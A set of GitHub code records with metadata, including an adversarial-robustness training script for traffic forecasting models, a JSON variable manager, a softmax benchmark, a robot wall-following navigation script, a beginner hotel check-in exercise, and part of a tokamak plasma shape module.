out_dim=cfgs.num_timesteps_output,\n residual_channels=nhid, dilation_channels=nhid, skip_channels=nhid * 8,\n end_channels=nhid * 16).to(device=args.device)\n\n else:\n raise NameError\n\n policy_online_method_lists = [\"AT_policy_atten\"]\n policy_offine_method_lists = [\"AT_policy_atten_offine\", \"AT_policy_atten_dist_offline\"]\n\n if cfgs.train_mode in policy_online_method_lists:\n dropout = 0.3\n supports = None\n gcn_bool = True\n addaptadj = True\n aptinit = None\n nhid = 4\n victim_nodes = int(cfgs.train_attack_nodes * len(A_wave))\n policynet = STPolicyAttentionNet(victim_nodes = victim_nodes,device = device, num_nodes=cfgs.num_nodes, dropout=dropout, supports=supports, gcn_bool=gcn_bool,\n addaptadj=addaptadj, aptinit=aptinit, in_dim=cfgs.num_features, out_dim=cfgs.hidden_embedding_dims,\n residual_channels=nhid, dilation_channels=nhid, skip_channels=nhid * 8,\n end_channels=nhid * 16).to(device=args.device)\n policy_optimizer = torch.optim.Adam(policynet.parameters(), lr=1e-3)\n elif cfgs.train_mode in policy_offine_method_lists:\n dropout = 0.3\n supports = None\n gcn_bool = True\n addaptadj = True\n aptinit = None\n nhid = 4\n victim_nodes = int(cfgs.train_attack_nodes * len(A_wave))\n policynet = STPolicyAttentionNet(victim_nodes=victim_nodes, device=device, num_nodes=cfgs.num_nodes,\n dropout=dropout, supports=supports, gcn_bool=gcn_bool,\n addaptadj=addaptadj, aptinit=aptinit, in_dim=cfgs.num_features,\n out_dim=cfgs.hidden_embedding_dims,\n residual_channels=nhid, dilation_channels=nhid, skip_channels=nhid * 8,\n end_channels=nhid * 16).to(device=args.device)\n policy_optimizer = None\n load_path = cfgs.policynet_path\n logger.info('Loading checkpoint from %s for policynet', load_path)\n policynet.load_state_dict(torch.load(load_path))\n\n else:\n\n policynet, policy_optimizer = None, None\n\n if args.mode == \"TRAIN\":\n load_path = None\n if cfgs.load_model is not None:\n load_path = cfgs.load_model\n\n elif cfgs.resume_epoch > 0:\n load_path = os.path.join(cfgs.model_dir, 'epoch{}.pt'.format(cfgs.resume_epoch))\n if load_path is not None:\n assert os.path.exists(load_path), load_path\n logger.info('Loading checkpoint from %s', load_path)\n model.load_state_dict(torch.load(load_path))\n\n\n\n\n\n\n # init loss function, optimizer\n if cfgs.loss_func == 'mae':\n loss_criterion = torch.nn.L1Loss().to(args.device)\n optimizer = torch.optim.Adam(model.parameters(), lr=0.03, eps=1.0e-8,\n weight_decay=0, amsgrad=False)\n elif cfgs.loss_func == 'mse':\n loss_criterion = torch.nn.MSELoss().to(args.device)\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)\n\n else:\n raise ValueError\n\n\n\n\n training_losses = []\n validation_losses = []\n validation_maes = []\n rewarding = []\n start_epoch = cfgs.resume_epoch + 1\n wait = 0\n val_loss_min = np.inf\n total_start = time.time()\n #print('========================start to training===========================')\n for epoch in range(start_epoch, cfgs.epochs + 1):\n\n if cfgs.dropout_type == 'none_dropout':\n A_wave, edges, edge_weights = A_wave, edges, edge_weights\n\n else:\n raise NameError\n\n\n if wait >= cfgs.patience and epoch >= cfgs.minimum_epoch:\n logger.info('early stop at epoch: %04d' % (epoch))\n torch.save(model.state_dict(),\n os.path.join(cfgs.model_dir, 'epoch_last.pt'))\n torch.save(model.state_dict(),\n os.path.join(cfgs.model_dir, 'epoch{}.pt'.format(cfgs.minimum_epoch)))\n break\n if epoch == (cfgs.minimum_epoch -1):\n logger.info('save model at epoch: %04d' % (epoch))\n torch.save(model.state_dict(),\n os.path.join(cfgs.model_dir, 'epoch{}.pt'.format(cfgs.minimum_epoch-1)))\n\n train_loss, val_loss, mae_score,train_reward = train(epoch, logger,train_loader,val_loader, model,optimizer, policynet, policy_optimizer,A_wave, A, loss_criterion, max_speed, edges, edge_weights)\n training_losses.append(train_loss)\n validation_losses.append(val_loss)\n validation_maes.append(mae_score)\n\n\n if val_loss <= val_loss_min:\n logger.info(\n 'val loss decrease from %.4f to %.4f, saving model to %s ' %\n (val_loss_min, val_loss, cfgs.model_dir))\n wait = 0\n val_loss_min = val_loss\n torch.save(model.state_dict(),\n os.path.join(cfgs.model_dir, 'epoch{}.pt'.format(epoch)))\n torch.save(model.state_dict(),\n os.path.join(cfgs.model_dir, 'best_epoch.pt'))\n logger.info('best model at epoch: %04d' % (epoch))\n else:\n wait += 1\n\n with open(cfgs.model_dir+\"/losses.pk\", \"wb\") as fd:\n pk.dump((training_losses, validation_losses, validation_maes), fd)\n\n logger_info(logger, distributed, 'Val Clean MAE: {:.4f}'.format(validation_maes[-1]))\n logger_info(logger, distributed, '[Remarks] {} | End of training, saved at {}'.format(cfgs.remark, cfgs.model_dir))\n logger_info(logger, distributed, 'Total training time:{:.3f}'.format(time.time() - total_start))\n elif args.mode == 'TEST':\n if cfgs.loss_func == 'mae':\n loss_criterion = torch.nn.L1Loss().to(args.device)\n elif cfgs.loss_func == 'mse':\n loss_criterion = torch.nn.MSELoss().to(args.device)\n else:\n raise ValueError\n load_path = cfgs.model_path\n logger.info('Loading checkpoint from %s', load_path)\n model.load_state_dict(torch.load(load_path))\n\n model.eval()\n _, test_clean_predict, test_target, test_adv_predict, index = eval_val_pgd(test_loader, model, A_wave, A, edges,\n edge_weights, loss_criterion, max_speed,\n cfgs)\n\n test_adv_predict, test_target = test_adv_predict * max_speed, test_target * max_speed\n test_adv_mae_score = mae(test_adv_predict, test_target)\n\n test_clean_predict = test_clean_predict * max_speed\n test_clean_mae_score = mae(test_clean_predict, test_target)\n\n logger_info(logger, distributed,\n 'Test Clean MAE: {:.4f} Test Adv MAE:{:.4f}'.format(test_clean_mae_score, test_adv_mae_score))\n logger_info(logger, distributed,\n '[Remarks] {} | End of training, saved at {}'.format(cfgs.remark, cfgs.model_dir))\nif __name__ == '__main__':\n main()\n","repo_name":"usail-hkust/RDAT","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":25417,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"38678797969","text":"import json\nimport os\n\nfrom systems.logger import log, debug_on\n\n\nclass VarManager:\n def __init__(self):\n self.varpath = \"./data/etc/vars.json\"\n\n def write(self, varname, varvalue):\n # added this to make sure the vars file exists for adding the first entry\n vardata = {varname: varvalue}\n if not os.path.exists(self.varpath):\n self.write_json(self.varpath, vardata)\n\n # open var file and add entry\n with open(self.varpath, \"r\") as f:\n data = json.load(f)\n data[varname] = varvalue\n self.write_json(self.varpath, data)\n\n def read(self, varname):\n with open(self.varpath, \"r\") as f:\n data = json.load(f)\n if varname in data:\n return data[varname]\n else:\n log(f'[ERROR] {varname} does not exist in vars.json')\n return None\n # raise ValueError(f'{varname} does not exist in vars.json')\n\n def write_json(self, filepath, data):\n with open(filepath, \"w\") as f:\n json.dump(data, f, indent=4)\n","repo_name":"matte54/ProjectReggie","sub_path":"systems/varmanager.py","file_name":"varmanager.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30995404769","text":"import torch\nimport torch.nn as nn\nimport time\n\n\nclass Net(nn.Module):\n def __init__(self):\n super().__init__()\n \n def forward(self, x):\n x = nn.functional.softmax(x, dim=-1)\n return x\n\n\ndef perf():\n # self-attention softmax performance\n batch_size = 256\n num_attention_heads = 12\n seq_length = 7\n steps = 1000\n\n x = torch.randn((batch_size, num_attention_heads, seq_length, seq_length))\n\n model = Net()\n\n # model = torch.compile(model)\n\n y = model(x)\n\n t0 = time.time()\n for _ in range(steps):\n model(x)\n origin_time = time.time() - t0\n\n if not hasattr(torch, 'set_extra_optimization'):\n print(\"no set_extra_optimization\")\n \n torch.set_extra_optimization(True)\n t0 = time.time()\n for _ in range(steps):\n model(x)\n opt_time = time.time() - t0\n\n print(origin_time, opt_time)\n scale = origin_time / opt_time\n print(scale)\n\n\ndef check():\n x = torch.randn((3, 7))\n y1 = nn.functional.softmax(x, dim=-1)\n # print(y1)\n\n if hasattr(torch, 'set_extra_optimization'):\n torch.set_extra_optimization(True)\n y2 = nn.functional.softmax(x, dim=-1)\n # print(y2)\n diff = torch.abs(y2 - y1).flatten()\n # print(diff)\n # sorted_diff, sorted_indices = torch.sort(diff, descending=True)\n print(torch.sum(diff > 1e-6))\n\n\n# check()\nperf()\n","repo_name":"imzhuhl/ml_workloads","sub_path":"pytorch/operator/softmax.py","file_name":"softmax.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32728464236","text":"import time,zmq,pickle\nimport numpy as np\nimport pyrealsense2 as rs\nimport open3d as o3d\nimport pointcloud as pc\nimport vehicle as veh\nimport visualise_pointclouds as visualise\nimport math\nfrom ast import literal_eval\nimport random\nimport os\n\n\ndef calculate_wall_angle(left_z, right_z):\n #TODO: Check this angle calculation is correct.\n delta_x = 2\n delta_y = left_z - right_z\n\n return math.degrees(math.atan2(delta_y, delta_x))\n\n\ndef main():\n \"\"\" \n This method is the heart of the Landrov navigation. \n It handles controling the multi-step navigation. \n The navigation settings can be configured within this.\n \"\"\"\n \n ############ Configuration ##################\n testing = False\n visualising = False\n save_clouds = False\n custom_folder_name = \"testing_side\"\n\n following_side = \"left\" # left or right\n target_distance = 0.4 # Meters\n error_distance = 0.20 # Meters\n error_angle = 10.0 # Degrees\n\n speed = 0.0 # Speed of the vehicle\n turn_speed = 0.5 # Speed * 2 normally\n turn_time_multiplier = 0.0 # Consecutive turns get bigger\n maximum_turns = 10 # Vehicle will stop after turning this many times in a row\n min_points_for_avoidance = 80 # Increase if navigation is disrupted due to noise\n\n # Pointcloud region configuration\n # X\n centerWidth = 5\n rightMinX = centerWidth / 2\n leftMaxX = -rightMinX\n\n # Z\n stopMinZ = 0.0\n stopMaxZ = 1.5\n\n # Y\n minY = -0.6\n maxY = 0.1\n\n # Visualisation region colours37\n mainColour = [1, 0, 0]\n leftColour = [0, 1, 0]\n rightColour = [0, 0, 1]\n\n ############ main loop ##################\n vehicle = veh.Vehicle(\"tcp://192.168.8.106\", \"5556\", \"5557\")\n\n if testing == False:\n vehicle.connect_control()\n print('Connected to vehicle server')\n\n vehicle.set_min_points_for_avoidance(min_points_for_avoidance) \n vehicle.set_following_variables(following_side, target_distance, error_distance, error_angle)\n vehicle.set_control_variables(speed, turn_speed, turn_time_multiplier, maximum_turns)\n\n found_cloud = False\n updated_cloud = False\n\n stopMin = [leftMaxX, minY, stopMinZ]\n stopMax = [rightMinX, maxY, stopMaxZ]\n\n leftMin = [-1, minY, stopMinZ]\n leftMax = [0, maxY, stopMaxZ]\n\n rightMin = [0, minY, stopMinZ]\n rightMax = [1, maxY, stopMaxZ]\n\n custom_folder_name += \"_\" + following_side + \"_\" + str(target_distance) + \"_\" + str(speed) + \"_\" + str(int(time.time()))\n time_start = time.time()\n\n try:\n while 1:\n if (testing):\n # Use saved pointcloud file\n filename = \"1.ply\"\n pcd = o3d.io.read_point_cloud(filename)\n npCloud = np.asarray(pcd.points)\n # Flips points to align with those from the landrov\n offset = np.array([0.5, 0, -0.5])\n pcd = pc.npToPcd(npCloud * np.array([1, -1, -1]) + offset)\n # Simulate delays in recieving pointcloud\n time.sleep(0.1)\n found_cloud = True\n \n if not found_cloud:\n vehicle.connect_pointcloud()\n while not found_cloud:\n if len(zmq.select([vehicle.sensor_socket],[],[],0)[0]):\n topic,buf = vehicle.sensor_socket.recv_multipart()\n if topic == b'pointcloud':\n time_start = time.time()\n np_pcd = np.fromstring(buf, dtype=np.float32)\n num_points = np_pcd.size // 3\n reshaped_pcd = np.resize(np_pcd, (num_points, 3))\n pcd = o3d.geometry.PointCloud()\n pcd.points = o3d.utility.Vector3dVector(reshaped_pcd)\n found_cloud = True\n\n vehicle.sensor_socket.close()\n\n else:\n downpcd = pcd.voxel_down_sample(voxel_size=0.01)\n\n cloud = pc.PointCloud(downpcd, mainColour, stopMin, stopMax)\n left = pc.PointCloud(downpcd, leftColour, leftMin, leftMax)\n right = pc.PointCloud(downpcd, rightColour, rightMin, rightMax)\n\n # Print status\n template = \"Points in cloud {}, x1 = {}, x2 = {}\"\n\n print(template.format(len(cloud.pcd.points), len(left.pcd.points), len(right.pcd.points)))\n print(\"Time taken\", round(time.time() - time_start, 2))\n time_start = time.time()\n\n updated_cloud = True\n\n # Display pointclouds\n if (visualising or save_clouds):\n mesh_frame = o3d.geometry.TriangleMesh.create_coordinate_frame(size=0.2, origin=[0, 0, 0])\n point_clouds = [mesh_frame, left.pcd, right.pcd]\n\n if visualising:\n visualise.visualise(point_clouds)\n\n left_points = np.asarray(left.pcd.points)\n left_average = np.mean(left_points, axis=0)[2]\n\n right_points = np.asarray(right.pcd.points)\n right_average = np.mean(right_points, axis=0)[2]\n\n average_distance = (left_average + right_average) / 2\n\n print(\"Left average:\", round(left_average, 2))\n print(\"Right average:\", round(right_average, 2))\n print(\"Average distance:\", round(average_distance, 2))\n \n # TODO: Wall angle adjust logic\n\n if average_distance < vehicle.target_distance + vehicle.error_distance and average_distance > vehicle.target_distance - vehicle.error_distance:\n angle = calculate_wall_angle(left_average, right_average)\n print(\"Angle from wall:\", round(angle, 2))\n if angle > (vehicle.error_angle / 2):\n print(\"Angle fix.\")\n vehicle.calculate_travel_time(angle)\n command = \"right\"\n elif angle < (-vehicle.error_angle / 2):\n print(\"Angle fix.\")\n vehicle.calculate_travel_time(angle)\n command = \"left\"\n else:\n print(\"At target distance.\")\n command = \"forward\"\n elif average_distance > vehicle.target_distance:\n print(\"Too far.\")\n vehicle.travel_time = 0.2\n command = \"left\"\n elif average_distance < vehicle.target_distance:\n print(\"Too close.\")\n vehicle.travel_time = 0.2\n command = \"right\"\n else: \n command = \"stop\"\n \n if command == \"left\" or command == \"right\":\n vehicle.turn(command)\n\n print(\"Command:\", command)\n\n if updated_cloud and not testing:\n if command == \"stop\":\n print(\"Landrov cannot find clear path...\")\n print(\"Stopping\")\n vehicle.stop()\n break\n elif command == \"forward\":\n vehicle.reset_turn_counts()\n vehicle.forward()\n print(\"Going Forward\")\n elif command == \"right\":\n print(\"Turn Right\")\n vehicle.turn(\"right\")\n elif command == \"left\":\n print(\"Turn Left\")\n vehicle.turn(\"left\")\n else:\n print(\"No Command\")\n vehicle.stop()\n \n found_cloud = False\n updated_cloud = False\n\n except KeyboardInterrupt:\n print(\"Force Close\")\n if not testing:\n vehicle.stop()\n\nmain()","repo_name":"MaxAndrewNZ/AutonomousNavigation","sub_path":"side_camera_test/side_camera_test.py","file_name":"side_camera_test.py","file_ext":"py","file_size_in_byte":7927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13055773249","text":"hotel = {\n '1': {\n '101': ['George Jefferson', 'Wheezy Jefferson'],\n \n },\n '2': {\n '237': ['Jack Torrance', 'Wendy Torrance'],\n },\n '3': {\n '333': ['Neo', 'Trinity', 'Morpheus']\n }\n}\n# using the start hotel above client can check in or check out of hotel\ndef hotel_check():\n check_in = input(\"Hi, please type 'check in' if checking in or 'check out' if checking out,\")\n floor_number = str(input('Please enter your floor number:'))\n room_number = str(input('Please enter your room number'))\n print(floor_number)\n print(room_number)\n \n # trys the floor number and if floor_number is in hotel it continues if not it asks if user wants to rety:\n try:\n if floor_number == hotel[floor_number]:\n pass\n #if person is checking out delete their room so others can stay\n if check_in == 'check out':\n # ensuring that the room they entered has occupants \n if hotel[floor_number][room_number]:\n # delete occupants from room\n del hotel[floor_number][room_number]\n print(\"Thank you for checking out! Please come and stay with us again!\")\n return hotel\n else:\n # prints message to inform user that room is vacant\n print(\"Sorry, that room is already vacant\")\n # prompt user to see if they want to restart\n try_again = input(\"Would you like to try again?(yes/no) \")\n # if they want to restart it prompts first questions again \n if try_again == 'yes':\n hotel_check()\n # if they dont want to retry it ends program\n else:\n return\n elif check_in == 'check in':\n # if they want to check in we have to make sure the room is empty first by checking if that room exists\n # if the room isnt in the hotel then the user can check in\n # this does allow user to enter any room number and this will work as long as it is not occupied\n if room_number not in hotel[floor_number]:\n # we ask user for number of occupants to know how many names to ask for\n number_of_occupants = int(input('Please enter the number if occupants? '))\n print('You will be prompted to enter the name of each occupant')\n occupant_list = []\n # asks for each occupants name so that we can enter them into the room\n for i in range(number_of_occupants):\n full_name = str(input('Please enter occupants name: ')) \n occupant_list.append(full_name)\n hotel[floor_number][room_number] = occupant_list\n else:\n # if the room does show up it is occupied so we let the user know\n print(\"I'm sorry but that room is already occupied.\")\n # prompt user to see if they want to restart\n try_again = input(\"Would you like to try again?(yes/no) \")\n # if they want to restart it prompts first questions again \n if try_again == 'yes':\n hotel_check()\n else:\n return\n except KeyError:\n # if the floor isnt in the hotel we tell user \n print('Sorry that is not a valid floor ')\n # ask user if they want to re-try\n re_try = input('Would you like to try again?(yes/no) ')\n # if they want to retry we reprompt them from the start\n if re_try == 'yes':\n hotel_check()\n else:\n # if they dont want to retry it ends program\n return\n \n print(hotel) \nhotel_check()\n","repo_name":"Anthony-Moss/python-dictionary-exercises","sub_path":"hotel_mgmt.py","file_name":"hotel_mgmt.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72379242667","text":"import copy\nimport enum\nimport random\nfrom typing import List, Optional, NamedTuple, Tuple, Union\n\nimport dataclasses\nimport numpy as np\nfrom scipy import interpolate\n\nfrom fusion_tcv import named_array\nfrom fusion_tcv import tcv_common\n\n\nclass Point(NamedTuple):\n \"\"\"A point in r,z coordinates.\"\"\"\n r: float\n z: float\n\n def to_polar(self) -> \"PolarPoint\":\n return PolarPoint(np.arctan2(self.z, self.r),\n np.sqrt(self.r**2 + self.z**2))\n\n def __neg__(self):\n return Point(-self.r, -self.z)\n\n def __add__(self, pt_or_val: Union[\"Point\", float]):\n if isinstance(pt_or_val, Point):\n return Point(self.r + pt_or_val.r, self.z + pt_or_val.z)\n else:\n return Point(self.r + pt_or_val, self.z + pt_or_val)\n\n def __sub__(self, pt_or_val: Union[\"Point\", float]):\n if isinstance(pt_or_val, Point):\n return Point(self.r - pt_or_val.r, self.z - pt_or_val.z)\n else:\n return Point(self.r - pt_or_val, self.z - pt_or_val)\n\n def __mul__(self, pt_or_val: Union[\"Point\", float]):\n if isinstance(pt_or_val, Point):\n return Point(self.r * pt_or_val.r, self.z * pt_or_val.z)\n else:\n return Point(self.r * pt_or_val, self.z * pt_or_val)\n\n def __truediv__(self, pt_or_val: Union[\"Point\", float]):\n if isinstance(pt_or_val, Point):\n return Point(self.r / pt_or_val.r, self.z / pt_or_val.z)\n else:\n return Point(self.r / pt_or_val, self.z / pt_or_val)\n\n __div__ = __truediv__\n\n\ndef dist(p1: Union[Point, np.ndarray], p2: Union[Point, np.ndarray]) -> float:\n return np.hypot(*(p1 - p2))\n\n\nShapePoints = List[Point]\n\n\ndef to_shape_points(array: np.ndarray) -> ShapePoints:\n return [Point(r, z) for r, z in array]\n\n\ndef center_point(points: ShapePoints) -> Point:\n return sum(points, Point(0, 0)) / len(points)\n\n\nclass ShapeSide(enum.Enum):\n LEFT = 0\n RIGHT = 1\n NOSHIFT = 2\n\n\nclass PolarPoint(NamedTuple):\n angle: float\n dist: float\n\n def to_point(self) -> Point:\n return Point(np.cos(self.angle) * self.dist, np.sin(self.angle) * self.dist)\n\n\ndef evenly_spaced_angles(num: int):\n return np.arange(num) * 2 * np.pi / num\n\n\ndef angle_aligned_dists(points: np.ndarray, angles: np.ndarray) -> np.ndarray:\n \"\"\"Return a new set of points along angles that intersect with the shape.\"\"\"\n # TODO(tewalds): Walk the two arrays together for an O(n+m) algorithm instead\n # of the current O(n*m). This would work as long as they are both sorted\n # around the radial direction, so the next intersection will be near the last.\n return np.array([dist_angle_to_surface(points, a) for a in angles])\n\n\ndef angle_aligned_points(points: np.ndarray, num_points: int,\n origin: Point) -> np.ndarray:\n \"\"\"Given a set of points, return a new space centered at origin.\"\"\"\n angles = evenly_spaced_angles(num_points)\n dists = angle_aligned_dists(points - origin, angles)\n return np.stack((np.cos(angles) * dists,\n np.sin(angles) * dists), axis=-1) + origin\n\n\ndef dist_angle_to_surface(points: np.ndarray, angle: float) -> float:\n \"\"\"Distance along a ray to the surface defined by a list of points.\"\"\"\n for p1, p2 in zip(points, np.roll(points, 1, axis=0)):\n d = dist_angle_to_segment(p1, p2, angle)\n if d is not None:\n return d\n raise ValueError(f\"Intersecting edge not found for angle: {angle}\")\n\n\ndef dist_angle_to_segment(p1, p2, angle: float) -> Optional[float]:\n \"\"\"Distance along a ray from the origin to a segment defined by two points.\"\"\"\n x0, y0 = p1[0], p1[1]\n x1, y1 = p2[0], p2[1]\n a0, b0 = np.cos(angle), np.sin(angle)\n a1, b1 = 0, 0\n # Segment/segment algorithm inspired by https://stackoverflow.com/q/563198\n denom = (b0 - b1) * (x0 - x1) - (y0 - y1) * (a0 - a1)\n if denom == 0:\n return None # Angle parallel to the segment, so can't intersect.\n xy = (a0 * (y1 - b1) + a1 * (b0 - y1) + x1 * (b1 - b0)) / denom\n eps = 0.00001 # Allow intersecting slightly beyond the endpoints.\n if -eps <= xy <= 1 + eps: # Check it hit the segment, not just the line.\n ab = (y1 * (x0 - a1) + b1 * (x1 - x0) + y0 * (a1 - x1)) / denom\n if ab > 0: # Otherwise it hit in the reverse direction.\n # If ab <= 1 then it's within the segment defined above, but given it's\n # a unit vector with one end at the origin this tells us the distance to\n # the intersection of an infinite ray out from the origin.\n return ab\n return None\n\n\ndef dist_point_to_surface(points: np.ndarray, point: np.ndarray) -> float:\n \"\"\"Distance from a point to the surface defined by a list of points.\"\"\"\n return min(dist_point_to_segment(p1, p2, point)\n for p1, p2 in zip(points, np.roll(points, 1, axis=0)))\n\n\ndef dist_point_to_segment(v: np.ndarray, w: np.ndarray, p: np.ndarray) -> float:\n \"\"\"Return minimum distance between line segment vw and point p.\"\"\"\n # Inspired by: https://stackoverflow.com/a/1501725\n l2 = dist(v, w)**2\n if l2 == 0.0:\n return dist(p, v) # v == w case\n # Consider the line extending the segment, parameterized as v + t (w - v).\n # We find projection of point p onto the line.\n # It falls where t = [(p-v) . (w-v)] / |w-v|^2\n # We clamp t from [0,1] to handle points outside the segment vw.\n t = max(0, min(1, np.dot(p - v, w - v) / l2))\n projection = v + t * (w - v) # Projection falls on the segment\n return dist(p, projection)\n\n\ndef sort_by_angle(points: ShapePoints) -> ShapePoints:\n center = sum(points, Point(0, 0)) / len(points)\n return sorted(points, key=lambda p: (p - center).to_polar().angle)\n\n\ndef spline_interpolate_points(\n points: ShapePoints, num_points: int,\n x_points: Optional[ShapePoints] = None) -> ShapePoints:\n \"\"\"Interpolate along a spline to give a smooth evenly spaced shape.\"\"\"\n ends = []\n if x_points:\n # Find the shape points that must allow sharp corners.\n for xp in x_points:\n for i, p in enumerate(points):\n if np.hypot(*(p - xp)) < 0.01:\n ends.append(i)\n\n if not ends:\n # No x-points forcing sharp corners, so use a periodic spline.\n tck, _ = interpolate.splprep(np.array(points + [points[0]]).T, s=0, per=1)\n unew = np.arange(num_points) / num_points\n out = interpolate.splev(unew, tck)\n assert len(out[0]) == num_points\n return sort_by_angle(to_shape_points(np.array(out).T))\n\n # Generate a spline with an shape==x-point at each end.\n new_pts = []\n for i, j in zip(ends, ends[1:] + [ends[0]]):\n pts = points[i:j+1] if i < j else points[i:] + points[:j+1]\n num_segment_points = np.round((len(pts) - 1) / len(points) * num_points)\n unew = np.arange(num_segment_points + 1) / num_segment_points\n tck, _ = interpolate.splprep(np.array(pts).T, s=0)\n out = interpolate.splev(unew, tck)\n new_pts += to_shape_points(np.array(out).T)[:-1]\n if len(new_pts) != num_points:\n raise AssertionError(\n f\"Generated the wrong number of points: {len(new_pts)} != {num_points}\")\n return sort_by_angle(new_pts)\n\n\n@dataclasses.dataclass\nclass ParametrizedShape:\n \"\"\"Describes a target shape from the parameter set.\"\"\"\n r0: float # Where to put the center along the radial axis.\n z0: float # Where to put the center along the vertical axis.\n kappa: float # Elongation of the shape. (0.8, 3)\n delta: float # Triangulation of the shape. (-1, 1)\n radius: float # Radius of the shape (0.22, 2.58)\n lambda_: float # Squareness of the shape. Recommend (0, 0)\n side: ShapeSide # Whether and which side to shift the shape to.\n\n @classmethod\n def uniform_random_shape(\n cls,\n r_bounds=(0.8, 0.9),\n z_bounds=(0, 0.2),\n kappa_bounds=(1.0, 1.8), # elongation\n delta_bounds=(-0.5, 0.6), # triangulation\n radius_bounds=(tcv_common.LIMITER_WIDTH / 2 - 0.04,\n tcv_common.LIMITER_WIDTH / 2),\n lambda_bounds=(0, 0), # squareness\n side=(ShapeSide.LEFT, ShapeSide.RIGHT)):\n \"\"\"Return a random shape.\"\"\"\n return cls(\n r0=np.random.uniform(*r_bounds),\n z0=np.random.uniform(*z_bounds),\n kappa=np.random.uniform(*kappa_bounds),\n delta=np.random.uniform(*delta_bounds),\n radius=np.random.uniform(*radius_bounds),\n lambda_=np.random.uniform(*lambda_bounds),\n side=side if isinstance(side, ShapeSide) else random.choice(side))\n\n def gen_points(self, num_points: int) -> Tuple[ShapePoints, Point]:\n \"\"\"Generates a set of shape points, return (points, modified (r0, z0)).\"\"\"\n r0 = self.r0\n z0 = self.z0\n num_warped_points = 32\n points = np.zeros((num_warped_points, 2))\n theta = evenly_spaced_angles(num_warped_points)\n points[:, 0] = r0 + self.radius * np.cos(theta + self.delta * np.sin(theta)\n - self.lambda_ * np.sin(2 * theta))\n points[:, 1] = z0 + self.radius * self.kappa * np.sin(theta)\n if self.side == ShapeSide.LEFT:\n wall_shift = np.min(points[:, 0]) - tcv_common.INNER_LIMITER_R\n points[:, 0] -= wall_shift\n r0 -= wall_shift\n elif self.side == ShapeSide.RIGHT:\n wall_shift = np.max(points[:, 0]) - tcv_common.OUTER_LIMITER_R\n points[:, 0] -= wall_shift\n r0 -= wall_shift\n return (spline_interpolate_points(to_shape_points(points), num_points),\n Point(r0, z0))\n\n\ndef trim_zero_points(points: ShapePoints) -> Optional[ShapePoints]:\n trimmed = [p for p in points if p.r != 0]\n return trimmed if trimmed else None\n\n\nclass Diverted(enum.Enum):\n \"\"\"Whether a shape is diverted or not.\"\"\"\n ANY = 0\n LIMITED = 1\n DIVERTED = 2\n\n @classmethod\n def from_refs(cls, references: named_array.NamedArray) -> \"Diverted\":\n diverted = (references[\"diverted\", 0] == 1)\n limited = (references[\"limited\", 0] == 1)\n if diverted and limited:\n raise ValueError(\"Diverted and limited doesn't make sense.\")\n if diverted:\n return cls.DIVERTED\n if limited:\n return cls.LIMITED\n return cls.ANY\n\n\n@dataclasses.dataclass\nclass Shape:\n \"\"\"Full specification of a shape.\"\"\"\n params: Optional[ParametrizedShape] = None\n points: Optional[ShapePoints] = None\n x_points: Optional[ShapePoints] = None\n legs: Optional[ShapePoints] = None\n diverted: Diverted = Diverted.ANY\n ip: Optional[float] = None\n limit_point: Optional[Point] = None\n\n @classmethod\n def from_references(cls, references: named_array.NamedArray) -> \"Shape\":\n \"\"\"Extract a Shape from the references.\"\"\"\n if any(np.any(references[name] != 0)\n for name in (\"R\", \"Z\", \"kappa\", \"delta\", \"radius\", \"lambda\")):\n params = ParametrizedShape(\n r0=references[\"R\"][0],\n z0=references[\"Z\"][0],\n kappa=references[\"kappa\"][0],\n delta=references[\"delta\"][0],\n radius=references[\"radius\"][0],\n lambda_=references[\"lambda\"][0],\n side=ShapeSide.NOSHIFT)\n else:\n params = None\n\n ip = references[\"Ip\", 0]\n return cls(\n params,\n points=trim_zero_points(points_from_references(references, \"shape1\")),\n x_points=trim_zero_points(points_from_references(references,\n \"x_points\")),\n legs=trim_zero_points(points_from_references(references, \"legs\")),\n limit_point=trim_zero_points(points_from_references(\n references, \"limit_point\")[0:1]),\n diverted=Diverted.from_refs(references),\n ip=float(ip) if ip != 0 else None)\n\n def gen_references(self) -> named_array.NamedArray:\n \"\"\"Return the references for the parametrized shape.\"\"\"\n refs = tcv_common.REF_RANGES.new_named_array()\n\n if self.ip is not None:\n refs[\"Ip\", 0] = self.ip\n\n refs[\"diverted\", 0] = 1 if self.diverted == Diverted.DIVERTED else 0\n refs[\"limited\", 0] = 1 if self.diverted == Diverted.LIMITED else 0\n\n if self.params is not None:\n refs[\"R\", 0] = self.params.r0\n refs[\"Z\", 0] = self.params.z0\n refs[\"kappa\", 0] = self.params.kappa\n refs[\"delta\", 0] = self.params.delta\n refs[\"radius\", 0] = self.params.radius\n refs[\"lambda\", 0] = self.params.lambda_\n\n if self.points is not None:\n points = np.array(self.points)\n assert refs.names.count(\"shape_r\") >= points.shape[0]\n refs[\"shape_r\", :points.shape[0]] = points[:, 0]\n refs[\"shape_z\", :points.shape[0]] = points[:, 1]\n\n if self.x_points is not None:\n x_points = np.array(self.x_points)\n assert refs.names.count(\"x_points_r\") >= x_points.shape[0]\n refs[\"x_points_r\", :x_points.shape[0]] = x_points[:, 0]\n refs[\"x_points_z\", :x_points.shape[0]] = x_points[:, 1]\n\n if self.legs is not None:\n legs = np.array(self.legs)\n assert refs.names.count(\"legs_r\") >= legs.shape[0]\n refs[\"legs_r\", :legs.shape[0]] = legs[:, 0]\n refs[\"legs_z\", :legs.shape[0]] = legs[:, 1]\n\n if self.limit_point is not None:\n refs[\"limit_point_r\", 0] = self.limit_point.r\n refs[\"limit_point_z\", 0] = self.limit_point.z\n\n return refs\n\n def canonical(self) -> \"Shape\":\n \"\"\"Return a canonical shape with a fixed number of points and params.\"\"\"\n num_points = tcv_common.REF_RANGES.count(\"shape_r\")\n out = copy.deepcopy(self)\n\n if out.points is None:\n if out.params is None:\n raise ValueError(\"Can't canonicalize with no params or points.\")\n out.points, center = out.params.gen_points(num_points)\n out.params.r0 = center.r\n 